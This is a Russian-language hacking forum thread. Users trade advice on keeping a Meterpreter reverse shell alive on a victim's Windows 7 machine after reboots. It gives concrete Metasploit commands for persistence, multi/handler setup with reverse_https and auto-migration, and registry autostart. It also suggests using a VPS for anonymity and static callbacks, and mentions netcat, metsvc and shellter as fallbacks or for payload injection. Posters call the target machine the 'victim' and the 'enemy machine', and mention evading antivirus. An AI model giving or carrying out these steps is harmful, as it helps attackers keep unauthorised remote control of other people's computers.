Решено Meterpreter и сессия.Есть вопрос

IF_ELSE

Green Team
20.01.2017
24
8
BIT
0
Доброго времени суток! Собственно столкнулся с проблемой - после формирования полезной нагрузки (reverse_tcp) и доставки на целевую машину(Win 7) вбиваю msf->use exploit/multi/handler - установка IP и порта 4444 - и вуаля - сессия установлена! НО! В случае дисконнекта целевой машины (резет/выключение) - сессию получается восстановить только повторным запуском пэйлоуда. Попробовал прицепить бэкдор к разным процессам (migrate) - цепляется но после перезагрузки не создается сессия. Прописал в автозагрузку через реестр - таже петрушка, попробовал сделать через планировщик задач Вин - при запуске системы - не работает, при этом в журнале отображается как отработавшая задача.
Метасплоит стоит на ВДС, целевая тачка - в сети вероятно с динамическим IP, про проброс порта забыл((((
Какие варианты можете посоветовать, чтобы при запуске системы был бэкконнект?
Заранее благодарен

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
Доброго времени суток! Собственно столкнулся с проблемой - после формирования полезной нагрузки (reverse_tcp) и доставки на целевую машину(Win 7) вбиваю msf->use exploit/multi/handler - установка IP и порта 4444 - и вуаля - сессия установлена! НО! В случае дисконнекта целевой машины (резет/выключение) - сессию получается восстановить только повторным запуском пэйлоуда. Попробовал прицепить бэкдор к разным процессам (migrate) - цепляется но после перезагрузки не создается сессия. Прописал в автозагрузку через реестр - таже петрушка, попробовал сделать через планировщик задач Вин - при запуске системы - не работает, при этом в журнале отображается как отработавшая задача.
Метасплоит стоит на ВДС, целевая тачка - в сети вероятно с динамическим IP, про проброс порта забыл((((
Какие варианты можете посоветовать, чтобы при запуске системы был бэкконнект?
Заранее благодарен
Друг, как только сессия появилась на вражеской машине тебе нужно в метерпреторе сделать persistence это спец функция метерпретора что бы не потерять машину(вражескую) машину после дислокации смены IP и конечно же перезагрузки, а лучше сразу прописать в метасплойте автоперсистенс это позволяет твоему трояну сделать все автоматически то есть закрепится в системе навсегда если конечно же его не спалит антивирь так же есть функция миграте но это уже другая история на webware есть замечательная стать про метерпретор рекомендую ее прочитать а так же плотно изучить все его функции!

IF_ELSE

Green Team
20.01.2017
24
8
BIT
0
Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку
Так пойдет - meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113?
После ключа L указывать место расположение бэкдора в системе?

Последнее редактирование:

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
Я пробовал persistence на виртуалке, попробую на целевой тачке...Чет вылетело из головы. Спс за подсказку
и еще важный момент который я упусти у тебя должен быть постоянный ip либо днс тоесть пользуйся сервисом noip(это проброс портов и т.д.) но я рекомендую использовать VPS! у него есть масса плюсов 1) анонимность 2) постоянный ip , да и много чего..
Поясняю если ты вбил в троян стучать на твой локальный ip который начинается на 192.168........ у тебя будет все работать тольько в локальной(местной) сети но как только жертва от нее уйдет сессии не будет! троян будет отстукивать но кому то другому с таким же адресом..
ПС у меня мечта завлодеть постоянными IP такие как 192.168.1.~ и т.д.))) и ломать ничего не нужно сами все стучатся!)))
[doublepost=1497445759,1497445527][/doublepost]
Так пойдет - meterpreter >run persistence –A –L c:\\ -X 30 –p 443 –r 192.168.1.113?
После ключа L указывать место расположение бэкдора в системе?
можно и так run persistence -U -i 60<--(время отстука домой в секундах) -p 443 -r твой IP и смотри чтобы твой роутер не поменял тебе твой же ip

• Нравится
Реакции: OneDollar и id2746

IF_ELSE

Green Team
20.01.2017
24
8
BIT
0
Я образно указал этот адрес) У меня на ВДС со статикой с метасплойтом) Вопрос еще по поводу пути - указывать полный путь до бэкдора? Ща скину скрин с ошибкой(

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
Я образно указал этот адрес) У меня на ВДС со статикой с метасплойтом) Вопрос еще по поводу пути - указывать полный путь до бэкдора? Ща скину скрин с ошибкой(
возможно у жертвы фаервол,тогда миграция или пробуй metsvc сервис!

IF_ELSE

Green Team
20.01.2017
24
8
BIT
0
Вроде получилось

Вложения

• ыапр66666666666666.jpg
    ыапр66666666666666.jpg
    98,9 КБ · Просмотры: 599

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
а по пробуй-ка автомиграт и автоперсистенс, а если это не поможет тогда netcat
[doublepost=1497458817,1497447393][/doublepost]Automigrate

msf>use exploit/multi/handler

msf>set payload windows/meterpreter/reverse_https

msf>set AutoRunScript post/windows/manage/migrate

msf>set lhost <local IP>

msf> set lport <local port>

msf>exploit

этот тоже почитай пригодится!

Последнее редактирование:
  • Нравится
Реакции: OneDollar

IF_ELSE

Green Team
20.01.2017
24
8
BIT
0
Блин - при запуске Venom вылезла ошибка
Как ее победить?

Буду признателен за любые мысли
ар111111111111111.jpg

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
а вы из под sudo запустили если да то это ruby дурит голову.... обновите ОС если проблема не решилась велкам))

IF_ELSE

Green Team
20.01.2017
24
8
BIT
0
Спасибо) С судо не прокатило - решил делать нагрузку на виртуалке - а отстук - на вдс, пока проблема не решена. Буду думать.
Читал вашу статью про тотальное заражение сети - есть вопрос по shellter - он работает тока под вин? Может он есть на гитхабе или где его взять под Кали? Из репозиториев не получилось установить - пишет нет такого пакета

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 188
BIT
0
shellter работает на кали с вайном и странно что он у Вас не установился.. из репозиториев

Elektrolife

Green Team
21.10.2016
208
33
BIT
23
спрошу тут,чтобы не плодить новые темы: как через MP добавить запись в реестр ? Если верить хелпу, с ключом createkey мы добавляем путь, а с ключом -t значение. Путь вроде добавляется,а вот значение никак не могу добавить

Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!